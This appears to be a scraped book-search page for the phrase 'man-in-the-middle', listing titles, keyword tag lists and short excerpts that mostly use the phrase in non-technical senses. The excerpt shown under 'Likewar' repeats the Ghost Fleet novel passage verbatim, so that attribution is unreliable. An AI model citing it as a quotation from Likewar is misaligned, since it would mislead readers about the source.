wandering into staff meetings See n.d. notes, early 9/79, page 8, “No nation can survive under fiat money”; “Meeting on Public Policy Issues,” September 6, 1979; both RRPL, Box 103, “Meetings—9/1979” folder. See also PH, Box 11, Fred Iklé, for working drafts of fall 1979 policy position statements. Germond was skeptical Jack Germond, Fat Man in the Middle Seat: Forty Years of Covering Politics (New York: Random House, 1999), 150–52. vituperation directed at Jackson Ian Shapiro, The Last Great Senate: Courage and Statesmanship in Times of Crisis (New York: Public Affairs Books, 2012), 292. North American Aerospace Defense Command July 30 and July 31, 1979, schedule, RRPL, Box 76; Frances FitzGerald, Way Out There in the Blue: Reagan, Star Wars, and the End of the Cold War (New York: Simon & Schuster, 2000), 20–21; Robert Scheer, With Enough Shovels: Reagan, Bush, and Nuclear War (New York: Random House, 1982), 104, 232.
Ghost Fleet: A Novel of the Next World War by P. W. Singer, August Cole
3D printing, Admiral Zheng, air gap, augmented reality, British Empire, digital map, energy security, Firefox, glass ceiling, global reserve currency, Google Earth, Google Glasses, IFF: identification friend or foe, Just-in-time delivery, low earth orbit, Maui Hawaii, military-industrial complex, MITM: man-in-the-middle, new economy, old-boy network, operational security, RAND corporation, reserve currency, RFID, Silicon Valley, Silicon Valley startup, South China Sea, sovereign wealth fund, space junk, stealth mode startup, three-masted sailing ship, trade route, Virgin Galactic, Wall-E, We are Anonymous. We are Legion, WikiLeaks, zero day, zero-sum game
Then he noticed that they were tensing up as the elevator lights numbered ever closer to their floor. The door opened and another armed phalanx emerged; these bodyguards were Caucasian in ethnicity and wearing civilian suits, but they were clearly military. While the two groups eyed each other warily, Wang watched how the elderly man in the middle didn’t bother even to look up from the outdated computer tablet he tapped away on. Red diamonds and purple hearts reflected in his traditional eyeglasses. He was surprisingly fit for his age, but supposedly the old Russian spy was addicted to memory-improving games, an effort to stave off what Directorate intelligence suspected was dementia.
We Are Anonymous: Inside the Hacker World of LulzSec, Anonymous, and the Global Cyber Insurgency by Parmy Olson
4chan, Asperger Syndrome, bitcoin, call centre, Chelsea Manning, corporate governance, crowdsourcing, disinformation, Firefox, Gabriella Coleman, hive mind, it's over 9,000, Julian Assange, lolcat, Minecraft, MITM: man-in-the-middle, Occupy movement, off-the-grid, peer-to-peer, pirate software, side project, Skype, speech recognition, SQL injection, Stephen Hawking, Stuxnet, We are Anonymous. We are Legion, We are the 99%, web application, WikiLeaks, zero day
A database with passwords was worth more, since spammers could then send spam from legitimate addresses. Occasionally a thread would start with a post seeking “freelancers” who could program in C, Objective-C, C#, VB, Java, and JavaScript. One post from June of 2010 had the title “DGs [Digital Gangsters] in Washington? Be my mail man in the middle,” followed by: “Heres how it works. A delivery gets shipped to your address, You open the package remove item, Reship the item to me in a new container with a false return address. when item arrives you get paid. interested?” The description of Jin-Soo Byun was sourced from interviews with Jennifer Emick and Laurelai Bailey; the note that Aaron Barr was helping her investigation was sourced from an interview with Barr.
Accelerando by Stross, Charles
book value, business cycle, call centre, carbon-based life, cellular automata, cognitive dissonance, commoditize, Conway's Game of Life, dark matter, disinformation, dumpster diving, Extropian, financial engineering, finite state, flag carrier, Flynn Effect, Future Shock, glass ceiling, gravity well, John von Neumann, junk bonds, Kickstarter, knapsack problem, Kuiper Belt, machine translation, Magellanic Cloud, mandelbrot fractal, market bubble, means of production, military-industrial complex, MITM: man-in-the-middle, Neal Stephenson, orbital mechanics / astrodynamics, packet switching, performance metric, phenotype, planetary scale, Pluto: dwarf planet, quantum entanglement, reversible computing, Richard Stallman, satellite internet, SETI@home, Silicon Valley, Singularitarianism, Skinner box, slashdot, South China Sea, stem cell, technological singularity, telepresence, The Chicago School, theory of mind, Turing complete, Turing machine, Turing test, upwardly mobile, Vernor Vinge, Von Neumann architecture, warehouse robotics, web of trust, Y2K, zero-sum game
And because he's still basically a little kid, and not fully in control of his own metaprogramming, instead of adjusting his outlook so that he isn't bored anymore, he sneaks out through his bedroom gate (which big-Manni-ghost reprogrammed for him sometime ago so that it would forward to an underused public A-gate that he'd run a man-in-the-middle hack on, so he could use it as a proxy teleport server) then down to the underside of Red Plaza, where skinless things gibber and howl at their tormentors, broken angels are crucified on the pillars that hold up the sky, and gangs of semiferal children act out their psychotic fantasies on mouthless android replicas of parents and authorities.
Chaos Monkeys: Obscene Fortune and Random Failure in Silicon Valley by Antonio Garcia Martinez
Airbnb, airport security, always be closing, Amazon Web Services, Big Tech, Burning Man, business logic, Celtic Tiger, centralized clearinghouse, cognitive dissonance, collective bargaining, content marketing, corporate governance, Credit Default Swap, crowdsourcing, data science, deal flow, death of newspapers, disruptive innovation, Dr. Strangelove, drone strike, drop ship, El Camino Real, Elon Musk, Emanuel Derman, Fairchild Semiconductor, fake it until you make it, financial engineering, financial independence, Gary Kildall, global supply chain, Goldman Sachs: Vampire Squid, Hacker News, hive mind, How many piano tuners are there in Chicago?, income inequality, industrial research laboratory, information asymmetry, information security, interest rate swap, intermodal, Jeff Bezos, Kickstarter, Malcom McLean invented shipping containers, Marc Andreessen, Mark Zuckerberg, Maui Hawaii, means of production, Menlo Park, messenger bag, minimum viable product, MITM: man-in-the-middle, move fast and break things, Neal Stephenson, Network effects, orbital mechanics / astrodynamics, Paul Graham, performance metric, Peter Thiel, Ponzi scheme, pre–internet, public intellectual, Ralph Waldo Emerson, random walk, Reminiscences of a Stock Operator, Ruby on Rails, Salesforce, Sam Altman, Sand Hill Road, Scientific racism, second-price auction, self-driving car, Sheryl Sandberg, Silicon Valley, Silicon Valley startup, Skype, Snapchat, social graph, Social Justice Warrior, social web, Socratic dialogue, source of truth, Steve Jobs, tech worker, telemarketer, the long tail, undersea cable, urban renewal, Y Combinator, zero-sum game, éminence grise
Figure out a point of overlooked business or technical leverage, interpose some piece of cleverness, and gleefully marvel at the resulting disruption (or destruction). In that spirit did we respond to my favorite question on the YC application:* What (non-computer) system have you ever hacked? I conducted a man-in-the-middle attack on Craigslist’s online dating ads. I posted an ad as a woman looking for a man, and as a man looking for a woman. I’d pass email from real man to fictional woman as the replies of fictional man to the real women, and basically crossed the email streams. At one point I shifted each real person off my fictional email addresses, and to the corresponding opposite-sex real email addresses.
What We Cannot Know: Explorations at the Edge of Knowledge by Marcus Du Sautoy
Albert Michelson, Andrew Wiles, Antoine Gombaud: Chevalier de Méré, Arthur Eddington, banking crisis, bet made by Stephen Hawking and Kip Thorne, Black Swan, Brownian motion, clockwork universe, cosmic microwave background, cosmological constant, dark matter, Dmitri Mendeleev, Eddington experiment, Edmond Halley, Edward Lorenz: Chaos theory, Ernest Rutherford, Georg Cantor, Hans Lippershey, Harvard Computers: women astronomers, heat death of the universe, Henri Poincaré, Higgs boson, invention of the telescope, Isaac Newton, Johannes Kepler, Large Hadron Collider, Magellanic Cloud, mandelbrot fractal, MITM: man-in-the-middle, Murray Gell-Mann, music of the spheres, Necker cube, Paul Erdős, Pierre-Simon Laplace, quantum entanglement, Richard Feynman, seminal paper, Skype, Slavoj Žižek, stem cell, Stephen Hawking, technological singularity, Thales of Miletus, Turing test, wikimedia commons
Exactly halfway between them is a third member of the gang. The train is racing through a station. A police officer is watching the scene. Let me first consider the situation on the train. As far as the gang members are concerned, the train can be considered at rest. The guns go off. The bullets hit the man in the middle at the same time. The speed of the bullets and the distance they have to cover is the same, and as far as everyone on the train is concerned the gunmen both shot at the same moment. Indeed, the victim saw light flash from the guns at the same moment, just before being hit by the bullets. But what about the perspective of the police officer?
Days of Fire: Bush and Cheney in the White House by Peter Baker
"Hurricane Katrina" Superdome, addicted to oil, Alan Greenspan, anti-communist, battle of ideas, Bear Stearns, Berlin Wall, Bernie Madoff, Bob Geldof, Boeing 747, buy low sell high, carbon tax, card file, clean water, collective bargaining, cuban missile crisis, desegregation, drone strike, energy security, facts on the ground, failed state, Fall of the Berlin Wall, friendly fire, Glass-Steagall Act, guest worker program, hiring and firing, housing crisis, illegal immigration, immigration reform, information security, Mikhail Gorbachev, MITM: man-in-the-middle, no-fly zone, operational security, Robert Bork, rolling blackouts, Ronald Reagan, Ronald Reagan: Tear down this wall, Saturday Night Live, South China Sea, stem cell, Ted Sorensen, too big to fail, uranium enrichment, War on Poverty, working poor, Yom Kippur War
CHAPTER 17: “WE WERE ALMOST ALL WRONG” 1 “I sure wasn’t going to”: Mary Cheney, Now It’s My Turn, 173–78. 2 “If you feel like you have to”: Ibid. 3 Five picked Gephardt: Gillespie, Winning Right, 51. 4 Jenna dreamed that her father: Thomas and the Staff of Newsweek, Election 2004, xix. 5 “Dean ran an ad with me”: Dick Gephardt, author interview. 6 “He’s done, it’s over”: Matt Schlapp and Dan Bartlett, author interviews. 7 Kerry won with 38 percent: New Hampshire Secretary of State’s office, http://www.sos.nh.gov/presprim2004/dpressum.htm. 8 “Let me begin by saying”: David Kay, testimony before the Senate Armed Services Committee, January 28, 2004, http://www.cnn.com/2004/US/01/28/kay.transcript/. 9 “Why would Saddam do something”: David Kay, author interview. 10 “was the right thing to do”: Colin Powell, interview with the Washington Post, excerpts printed February 3, 2004. 11 “It was something we all”: Barry Schweid, “Powell Says War Decision Was Correct Even If Weapon Stockpiles Did Not Exist,” Associated Press, February 3, 2004. 12 “despite some public statements”: George Tenet, speech at Georgetown University, February 5, 2004, https://www.cia.gov/news-information/speeches-testimony/2004/tenet_georgetownspeech_02052004.html. 13 declined to embrace: Sheryl Stolberg, “White House Avoids Stand on Gay Marriage Measure,” New York Times, July 2, 2003, http://www.nytimes.com/2003/07/02/us/white-house-avoids-stand-on-gay-marriage-measure.html. 14 “heard more about marriage”: Goeglein, Man in the Middle, 120. 15 Bush invited Cheney and top aides: Halperin and Harris, Way to Win, 254–55. 16 “There is a strong sense”: Undated campaign memo, provided to author. 17 “That decision influenced everything”: Matthew Dowd, interview with PBS’s Frontline, January 4, 2005, http://www.pbs.org/wgbh/pages/frontline/shows/architect/interviews/dowd.html. 18 “We have, I reminded him”: Laura Bush, Spoken from the Heart, 302–3. 19 “He brought up the fact”: Dick Cheney, author interview. 
20 “Cheney was pissed off”: Cheney friend, author interview. 21 “The union of a man and”: George W.
…
New York: Simon & Schuster, 2004. Gerson, Michael J. Heroic Conservatism: Why Republicans Need to Embrace America’s Ideals (and Why They Deserve to Fail if They Don’t). San Francisco: HarperOne, 2007. Gillespie, Ed. Winning Right: Campaign Politics and Conservative Policies. New York: Threshold, 2006. Goeglein, Tim. The Man in the Middle: An Inside Account of Faith and Politics in the George W. Bush Era. Nashville: B&H, 2011. Goldsmith, Jack L. The Terror Presidency: Law and Judgment Inside the Bush Administration. New York: W. W. Norton, 2007. Gordon, Michael, and Bernard E. Trainor. Cobra II: The Inside Story of the Invasion and Occupation of Iraq.
Oil: Money, Politics, and Power in the 21st Century by Tom Bower
"World Economic Forum" Davos, addicted to oil, Alan Greenspan, An Inconvenient Truth, Ayatollah Khomeini, banking crisis, bonus culture, California energy crisis, corporate governance, credit crunch, energy security, Exxon Valdez, falling living standards, fear of failure, financial engineering, forensic accounting, Global Witness, index fund, interest rate swap, John Deuss, Korean Air Lines Flight 007, kremlinology, land bank, LNG terminal, Long Term Capital Management, margin call, megaproject, Meghnad Desai, Mikhail Gorbachev, millennium bug, MITM: man-in-the-middle, Nelson Mandela, new economy, North Sea oil, offshore financial centre, oil shale / tar sands, oil shock, Oscar Wyatt, passive investing, peak oil, Piper Alpha, price mechanism, price stability, Ronald Reagan, shareholder value, short selling, Silicon Valley, sovereign wealth fund, transaction costs, transfer pricing, zero-sum game, éminence grise
Explorers using 3D and 4D seismic, horizontal drills, multilateral wells and smart infill drilling were likely to increase production from mature wells and revive dry ones to extract over 50 percent of the oil, as BP had accomplished at Thunder Horse. The world consumed about 30 billion barrels every year. Contrary to Campbell’s scenario, the problem was not how much oil was in the ground, but how much the producers would spend to extract it. Guy Caruso, the head of the EIA, was the man in the middle of the two sides’ increasingly sterile arguments. Appointed by the George W. Bush administration in 2002 after serving for 12 years as an energy analyst at the CIA, Caruso had won star status by correctly forecasting the 1973 crisis, but he had also been involved in the mistaken CIA forecast in 1977 that Russia would become a net oil importer.
The Accidental Empire: Israel and the Birth of the Settlements, 1967-1977 by Gershom Gorenberg
anti-communist, bank run, colonial rule, facts on the ground, Great Leap Forward, illegal immigration, MITM: man-in-the-middle, Mount Scopus, old-boy network, Suez crisis 1956, urban planning, Yom Kippur War
As the years passed, the pain and shame became stronger,” Katzover recalled—shame that there was “empty territory,” that “the whole world sees…Samaria is empty.” In 1972 the idea still did not occur to Katzover that he would do something about it himself. But in his testimony, as in Etzion’s, is the first scent of an intoxicating impatience.39 THE MOST impatient man in the Middle East, though, was Anwar al-Sadat. Egypt’s leader wanted the Sinai Peninsula back. Recalling the lessons of his Nile Delta peasant childhood, speaking of neighbors who would fight for fifty years over a meter of land, he said in a New York Times interview after taking power that “our land…means our honor here…and one dies for this honor.”
Light This Candle: The Life & Times of Alan Shepard--America's First Spaceman by Neal Thompson
Apollo 11, Apollo 13, built by the lowest bidder, Charles Lindbergh, Columbine, cuban missile crisis, Donald Trump, low interest rates, military-industrial complex, MITM: man-in-the-middle, Neil Armstrong, Norman Mailer, place-making, Silicon Valley, William Langewiesche
That made some of the press happy but earned Shorty complaints from NASA and the astronauts that he was exploiting the Mercury Seven. “I think all seven guys really enjoyed the exposure—they are human and they don’t mind seeing their names in the papers,” Shorty once said. “Yet, as test pilots, they instinctively rebelled at having to spend time with the news media.” That continuous problem of being the man in the middle would literally drive Shorty to drink. A lot. And drink would one day cost him his job and, eventually, his life. In an effort to smooth the feathers that his press policies had ruffled, Shorty one day gathered the seven in a room at Langley and tried to explain that many reporters continued to accuse him, and the astronauts, of giving the Life people special access.
Red Plenty by Francis Spufford
Adam Curtis, affirmative action, anti-communist, Anton Chekhov, asset allocation, Buckminster Fuller, clean water, cognitive dissonance, computer age, double helix, Fellow of the Royal Society, John von Neumann, Kickstarter, Kim Stanley Robinson, Kitchen Debate, linear programming, lost cosmonauts, market clearing, MITM: man-in-the-middle, New Journalism, oil shock, Philip Mirowski, plutocrats, profit motive, RAND corporation, scientific management, Simon Kuznets, the scientific method
Riffle riffle went the invisible card index. Ah yes, Ryszard: early forties, Pole from the Ukraine, wife religious, lots of children. Pleasant chap. Drinking problem. Probably not destined to rise. Chekuskin put the coin in the slot and dialled. ‘Ryszard, yes, hello?’ Harried-sounding voice; a man in the middle of something. ‘Chekuskin here. Sorry to bother you –’ ‘I can’t really talk. Later would be better.’ ‘Of course, of course, whenever you can. Maybe a drink this evening?’ ‘I don’t know. I’ve a family do. God, this is the Solkemfib thing, isn’t it?’ ‘Well, yes. There’s some puzzlement at this end –’ ‘I’m sorry, Chekuskin, but really, that’s one to leave alone.
The Debian Administrator's Handbook, Debian Wheezy From Discovery to Mastery by Raphaël Hertzog, Roland Mas
bash_history, Debian, distributed generation, do-ocracy, en.wikipedia.org, end-to-end encryption, failed state, Firefox, Free Software Foundation, GnuPG, Google Chrome, Jono Bacon, MITM: man-in-the-middle, Neal Stephenson, NP-complete, precautionary principle, QWERTY keyboard, RFC: Request For Comment, Richard Stallman, Skype, SpamAssassin, SQL injection, Valgrind, web application, zero day, Zimmermann PGP
First, the DNS server can now run under an unprivileged user, so that a security vulnerability in the server does not grant root privileges to the attacker (as was seen repeatedly with versions 8.x). Furthermore, Bind supports the DNSSEC standard for signing (and therefore authenticating) DNS records, which allows blocking any spoofing of this data during man-in-the-middle attacks. CULTURE DNSSEC The DNSSEC norm is quite complex; this partly explains why it's not in widespread usage yet (even if it perfectly coexists with DNS servers unaware of DNSSEC). To understand all the ins and outs, you should check the following article. → http://en.wikipedia.org/wiki/Domain_Name_System_Security_Extensions
Who Stole the American Dream? by Hedrick Smith
Affordable Care Act / Obamacare, Airbus A320, airline deregulation, Alan Greenspan, anti-communist, asset allocation, banking crisis, Bear Stearns, Boeing 747, Bonfire of the Vanities, British Empire, business cycle, business process, clean water, cloud computing, collateralized debt obligation, collective bargaining, commoditize, corporate governance, Credit Default Swap, credit default swaps / collateralized debt obligations, currency manipulation / currency intervention, David Brooks, Deng Xiaoping, desegregation, Double Irish / Dutch Sandwich, family office, financial engineering, Ford Model T, full employment, Glass-Steagall Act, global supply chain, Gordon Gekko, guest worker program, guns versus butter model, high-speed rail, hiring and firing, housing crisis, Howard Zinn, income inequality, independent contractor, index fund, industrial cluster, informal economy, invisible hand, John Bogle, Joseph Schumpeter, junk bonds, Kenneth Rogoff, Kitchen Debate, knowledge economy, knowledge worker, laissez-faire capitalism, Larry Ellison, late fees, Long Term Capital Management, low cost airline, low interest rates, manufacturing employment, market fundamentalism, Maui Hawaii, mega-rich, Michael Shellenberger, military-industrial complex, MITM: man-in-the-middle, mortgage debt, negative equity, new economy, Occupy movement, Own Your Own Home, Paul Samuelson, Peter Thiel, Plutonomy: Buying Luxury, Explaining Global Imbalances, Ponzi scheme, Powell Memorandum, proprietary trading, Ralph Nader, RAND corporation, Renaissance Technologies, reshoring, rising living standards, Robert Bork, Robert Shiller, rolodex, Ronald Reagan, Savings and loan crisis, shareholder value, Shenzhen was a fishing village, Silicon Valley, Silicon Valley startup, Solyndra, Steve Jobs, stock buybacks, tech worker, Ted Nordhaus, The Chicago School, The Spirit Level, too big to fail, transaction costs, transcontinental railway, union organizing, Unsafe at Any Speed, Vanguard fund, We are the 99%, women in the workforce, working poor, Y2K
Bush, the White House, and the Education of Paul O’Neill (New York: Simon & Schuster, 2004), 150. 8 That very morning “Key Goals Face Early Obstacles,” The Washington Post, February 27, 2001. 9 An NBC/Wall Street Journal poll “Public Buys Bush’s Tax-Cut Plan, but Details Magnify Differences,” The Wall Street Journal, March 8, 2001. 10 An even stronger tilt “Poll Analysis: Bush in Honeymoon Period,” Los Angeles Times, March 8, 2001. 11 “Washington derives so much of its power” Stevenson, “Itching to Rebuild the Tax Law.” 12 “Dirk is always well positioned” Jeffrey Birnbaum, “The Man in the Middle,” CNNMoney.com, April 1, 2002, http://money.cnn.com. 13 “That coalition was very important” Jensen, Salant, and Forsythe, “Bush Relies on Corporate Lobbyists.” 14 “The President has it backwards” “Bush Pushes Huge Tax Cut in U.S. Congress Debut,” Dallas Morning News, February 28, 2001. 15 Protests in several cities “Union Campaigns to Thwart Tax Cut Plan,” Atlanta Daily World, April 8, 2001. 16 Bush was the one urging voters Marc Lacey, “Bush Deploys Charm on Daschle in Pushing Tax Cut,” The New York Times, March 10, 2001. 17 A staggering $2 billion Jensen, Salant, and Forsythe, “Bush Relies on Corporate Lobbyists.” 18 The Business Roundtable The Center for Responsive Politics reported business interests pouring $333 million into the 2009–10 election campaign cycle.
Mr Five Per Cent: The Many Lives of Calouste Gulbenkian, the World's Richest Man by Jonathan Conlin
accounting loophole / creative accounting, anti-communist, banking crisis, British Empire, carried interest, cotton gin, Ernest Rutherford, estate planning, Fellow of the Royal Society, light touch regulation, military-industrial complex, MITM: man-in-the-middle, Network effects, Pierre-Simon Laplace, rent-seeking, stakhanovite, Suez canal 1869, vertical integration, Yom Kippur War
‘Siyasiyat: İstikraz Etrafında’, Tanin, 19 August 1910, p. 1. 31. Bompard to MAE, 17 October 1910. AMAE, CP Turquie 366, f. 90. For another perspective, see reports of 18 August and 17 September 1910. MBZ, CP Turquie 1909–10, ff. 69, 79. 32. ‘İstikraz Hakkında: Cavit Bey’in Beyanatı’, Tanin, 23 August 1910, p. 1. 33. For Laurent, see Ozan Ozavci, ‘A Man in the Middle: The Mission of Charles Laurent and the Young Turks’, in Gokhan Çetinsaya and Gül Tokay (eds.), Festschrift to Feroze A. K. Yasamee (Istanbul: ISIS Publications, forthcoming). 34. Le Temps, 20 September 1910. Hüseyin Cahit immediately picked up on this story, citing Le Temps as his source. ‘Yeni İstikraz’, Tanin, 20 September 1910, p. 1. 35.
1968: The Year That Rocked the World by Mark Kurlansky
anti-communist, Berlin Wall, colonial rule, cuban missile crisis, desegregation, Dr. Strangelove, East Village, Electric Kool-Aid Acid Test, European colonialism, feminist movement, global village, Haight Ashbury, Herbert Marcuse, land reform, Marshall McLuhan, Mikhail Gorbachev, military-industrial complex, MITM: man-in-the-middle, Norman Mailer, post-industrial society, Ronald Reagan, South China Sea
Che had sought to build the new man, the socialist who worked for the common good, was dedicated to the revolution, and was without selfishness and greed. Now the new man was sometimes referred to as “a man like Che.” Castro first spoke of the new man in a speech in May 1967, but 1968, with the “revolutionary offensive” under way, was the year of the new man. In the middle of his speech about the new offensive, Castro referred to another new phenomenon. “There almost exists an air route for those who take over planes.” The week of Fidel’s speech, National Airlines flight 28 took off from Tampa bound for Miami. After five minutes in the air, two Cuban exiles took out pistols, forced the flight attendant to open the cockpit, and shouted, “Havana!
The Upswing: How America Came Together a Century Ago and How We Can Do It Again by Robert D. Putnam
affirmative action, Affordable Care Act / Obamacare, Alan Greenspan, Alvin Toffler, Arthur Marwick, classic study, clean water, collective bargaining, correlation does not imply causation, David Brooks, demographic transition, desegregation, different worldview, Donald Trump, Edward Glaeser, en.wikipedia.org, equal pay for equal work, financial deregulation, gender pay gap, ghettoisation, Gordon Gekko, greed is good, Gunnar Myrdal, guns versus butter model, Herbert Marcuse, Ida Tarbell, immigration reform, income inequality, Kenneth Arrow, knowledge economy, labor-force participation, laissez-faire capitalism, low skilled workers, Mark Zuckerberg, market fundamentalism, mass immigration, mega-rich, meta-analysis, minimum wage unemployment, MITM: man-in-the-middle, obamacare, occupational segregation, open economy, opioid epidemic / opioid crisis, Overton Window, plutocrats, post-industrial society, Powell Memorandum, prosperity theology / prosperity gospel / gospel of success, public intellectual, road to serfdom, Robert Shiller, Ronald Reagan, Scientific racism, Second Machine Age, shareholder value, Silicon Valley, Steve Jobs, Steven Pinker, strikebreaker, The Rise and Fall of American Growth, The Spirit Level, trade liberalization, Travis Kalanick, Triangle Shirtwaist Factory, Tyler Cowen, Tyler Cowen: Great Stagnation, union organizing, Upton Sinclair, upwardly mobile, W. E. B. Du Bois, War on Poverty, white flight, women in the workforce, working poor, Works Progress Administration, yellow journalism
Brands, Traitor to His Class: The Privileged Life and Radical Presidency of Franklin Delano Roosevelt (New York: Doubleday, 2008). 22 On party politics from the 1920s to the 1940s, see Kennedy, Freedom from Fear. 23 Frederick Lewis Allen, Since Yesterday: The 1930s in America, September 3, 1929–September 3, 1939 (New York: Harper & Brothers, 1940), 189: “If a visitor from Mars had compared the two party platforms of 1936, concentrating his attention not on the denunciations and pointings-with-pride but merely upon the positive recommendations which they contained, he might have wondered why feeling ran so high in this campaign.” 24 Hendrik Meijer, Arthur Vandenberg: The Man in the Middle of the American Century (Chicago: University of Chicago Press, 2017), 162. 25 On Congressional politics, see Kennedy, Freedom from Fear, chap. 11, esp. 341–43; and Eric Schickler, “New Deal Liberalism and Racial Liberalism in the Mass Public, 1937–1968,” Perspectives on Politics 11, no. 1 (March 2013): 75–98, doi:10.1017/S1537592712003659: “There was a connection between attitudes towards the economic programs of the New Deal and racial liberalism early on, well before national party elites took distinct positions on civil rights.… The ideological meaning of New Deal liberalism sharpened in the late 1930s due to changes in the groups identified with Roosevelt’s program and due to the controversies embroiling New Dealers in 1937–38.” 26 The figures in the text are averaged across all key votes and where available, both houses of Congress.
Likewar: The Weaponization of Social Media by Peter Warren Singer, Emerson T. Brooking
4chan, active measures, Airbnb, augmented reality, barriers to entry, battle of ideas, Bellingcat, Bernie Sanders, Black Lives Matter, British Empire, Cambridge Analytica, Cass Sunstein, citizen journalism, Citizen Lab, Comet Ping Pong, content marketing, crony capitalism, crowdsourcing, data science, deep learning, digital rights, disinformation, disintermediation, Donald Trump, drone strike, Edward Snowden, en.wikipedia.org, Erik Brynjolfsson, Evgeny Morozov, fake news, false flag, Filter Bubble, global reserve currency, Google Glasses, Hacker Conference 1984, Hacker News, illegal immigration, information security, Internet Archive, Internet of things, invention of movable type, it is difficult to get a man to understand something, when his salary depends on his not understanding it, Jacob Silverman, John Gilmore, John Markoff, Kevin Roose, Kickstarter, lateral thinking, lolcat, Mark Zuckerberg, megacity, Menlo Park, meta-analysis, MITM: man-in-the-middle, Mohammed Bouazizi, Moneyball by Michael Lewis explains big data, moral panic, new economy, offshore financial centre, packet switching, Panopticon Jeremy Bentham, Parag Khanna, pattern recognition, Plato's cave, post-materialism, Potemkin village, power law, pre–internet, profit motive, RAND corporation, reserve currency, sentiment analysis, side project, Silicon Valley, Silicon Valley startup, Snapchat, social web, South China Sea, Steve Bannon, Steve Jobs, Steven Levy, Stewart Brand, systems thinking, too big to fail, trade route, Twitter Arab Spring, UNCLOS, Upton Sinclair, Valery Gerasimov, We are Anonymous. We are Legion, We are as Gods, Whole Earth Catalog, WikiLeaks, Y Combinator, yellow journalism, Yochai Benkler
Then he noticed that they were tensing up as the elevator lights numbered ever closer to their floor. The door opened and another armed phalanx emerged; these bodyguards were Caucasian in ethnicity and wearing civilian suits, but they were clearly military. While the two groups eyed each other warily, Wang watched how the elderly man in the middle didn’t bother even to look up from the outdated computer tablet he tapped away on. Red diamonds and purple hearts reflected in his traditional eyeglasses. He was surprisingly fit for his age, but supposedly the old Russian spy was addicted to memory-improving games, an effort to stave off what Directorate intelligence suspected was dementia.
The Language Instinct: How the Mind Creates Language by Steven Pinker
Albert Einstein, Boeing 747, cloud computing, Computing Machinery and Intelligence, David Attenborough, double helix, Drosophila, elephant in my pajamas, finite state, Gregor Mendel, illegal immigration, Joan Didion, language acquisition, Loebner Prize, mass immigration, Maui Hawaii, meta-analysis, MITM: man-in-the-middle, natural language processing, out of africa, phenotype, rolodex, Ronald Reagan, Sapir-Whorf hypothesis, Saturday Night Live, speech recognition, Steven Pinker, Strategic Defense Initiative, tacit knowledge, theory of mind, transatlantic slave trade, Turing machine, Turing test, twin studies, Yogi Berra
Let loose on our page, it would create the following: * * * Socrates is a man Every man is mortal Socrates * * * Its second reflex, also in response to finding an isa, is to get itself to the right of that isa and copy any ink marks it finds there into the holes of a new cutout. In our case, this forces the processor to make a cutout in the shape of man. Its third reflex is to scan down the page checking for ink marks shaped like Every, and if it finds some, seeing if the ink marks to the right align with its new cutout. In our example, it finds one: the man in the middle of the second line. Its fourth reflex, upon finding such a match, is to move to the right and copy the ink marks it finds there onto the bottom center of the page. In our example, those are the ink marks ismortal. If you are following me, you’ll see that our page now looks like this: * * * Socrates isa man Every man ismortal Socrates ismortal * * * A primitive kind of reasoning has taken place.
The Long Game: China's Grand Strategy to Displace American Order by Rush Doshi
"World Economic Forum" Davos, American ideology, anti-communist, Asian financial crisis, autonomous vehicles, Black Lives Matter, Bretton Woods, capital controls, coronavirus, COVID-19, crony capitalism, cross-border payments, cryptocurrency, defense in depth, deindustrialization, Deng Xiaoping, deplatforming, disinformation, Dissolution of the Soviet Union, Donald Trump, drone strike, energy security, European colonialism, eurozone crisis, financial innovation, George Floyd, global pandemic, global reserve currency, global supply chain, global value chain, Great Leap Forward, high-speed rail, Internet Archive, Internet of things, Kickstarter, kremlinology, Malacca Straits, middle-income trap, Mikhail Gorbachev, MITM: man-in-the-middle, Monroe Doctrine, Network effects, Nixon triggered the end of the Bretton Woods system, offshore financial centre, positional goods, post-truth, purchasing power parity, RAND corporation, reserve currency, rolodex, Ronald Reagan, South China Sea, special drawing rights, special economic zone, TikTok, trade liberalization, transaction costs, UNCLOS, undersea cable, zero-sum game
Natasha Turak, “Russia’s Central Bank Governor Touts Moscow Alternative to SWIFT Transfer System as Protection from US Sanctions,” CNBC, May 23, 2018, https://www.cnbc.com/2018/05/23/russias-central-bank-governor-touts-moscow-alternative-to-swift-transfer-system-as-protection-from-us-sanctions.html. 85Zhenhua Lu, “US House Committee Targets Major Chinese Banks’ Lifeline to North Korea,” South China Morning Post, September 13, 2017, https://www.scmp.com/news/china/policies-politics/article/2110914/us-house-committee-targets-major-chinese-banks-lifeline. 86Michelle Chen and Koh Gui Qing, “China’s International Payments System Ready, Could Launch by End-2015,” Reuters, March 9, 2015, http://www.reuters.com/article/2015/03/09/us-china-yuan-payments-exclusive-idUSKBN0M50BV20150309. 87Don Weinland, “China’s Global Payment System CIPs Too Costly for Most Banks—For Now,” South China Morning Post, October 17, 2015, https://www.scmp.com/business/banking-finance/article/1868749/chinas-global-payment-system-cips-too-costly-most-banks-now. 88Gabriel Wildau, “China Launch of Renminbi Payments System Reflects SWIFT Spying Concerns,” Financial Times, October 8, 2015, https://www.ft.com/content/84241292-66a1-11e5-a155-02b6f8af6a62. 89Prasad, Gaining Currency, 116. 90China and the Age of Strategic Rivalry (Ottawa: Canadian Security Intelligence Services, 2018), 113–22. 91Stefania Palma, “SWIFT Dips into China with CIPS,” The Banker, July 1, 2016, https://www.thebanker.com/Global-Transaction-Banking/Swift-dips-into-China-with-CIPS. 92“Beijing’s International Payments System Scaled Back for Launch,” South China Morning Post, July 23, 2015, https://www.scmp.com/business/money/article/1838428/beijings-international-payments-system-scaled-back-launch. 93Wildau, “China Launch of Renminbi Payments System Reflects SWIFT Spying Concerns.” 94China and the Age of Strategic Rivalry, 113–22. 95Wildau, “China Launch of Renminbi Payments System Reflects SWIFT Spying Concerns.” 96Bershidsky, “How Europe Can Keep the Money Flowing to Iran.” 97“EU Criticizes Role of US Credit Rating Agencies in Debt Crisis,” Deutsche Welle, July 11, 2011, https://www.dw.com/en/eu-criticizes-role-of-us-credit-rating-agencies-in-debt-crisis/a-15225330. 98Huw Jones and Marc Jones, “EU Watchdog Tightens Grip over Use of Foreign Credit Ratings,” Reuters, November 17, 2017, https://www.reuters.com/article/us-britain-eu-creditratingagencies/eu-watchdog-tightens-grip-over-use-of-foreign-credit-ratings-idUSKBN1DH1J1. 99“China’s Finance Minister Accuses Credit Rating Agencies of Bias,” South China Morning Post, April 16, 2016, https://www.scmp.com/news/china/economy/article/1936614/chinas-finance-minister-accuses-credit-rating-agencies-bias; Joe McDonald, “China Criticizes S&P Rating Cut as ‘Wrong Decision,’” Associated Press, September 22, 2017, 